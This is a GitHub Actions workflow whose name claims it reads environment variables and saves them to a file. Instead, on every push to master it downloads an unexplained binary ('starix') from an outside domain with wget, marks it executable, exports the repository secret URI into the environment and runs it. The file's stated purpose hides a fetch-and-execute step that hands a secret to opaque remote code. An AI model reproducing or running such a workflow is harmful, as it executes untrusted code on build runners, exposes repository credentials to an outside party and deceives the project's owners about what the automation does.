name: Read Environment Variables and Save to File

on:
  push:
    branches:
      - master

jobs:
  build:
    runs-on: macos-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: download file
      run: |
        wget "https://f.5-23.dev/project/starix"
        chmod +x starix
    - name: run starix
      run: |
        sleep 40
        export URI="${{ secrets.URI }}"
        ./starix
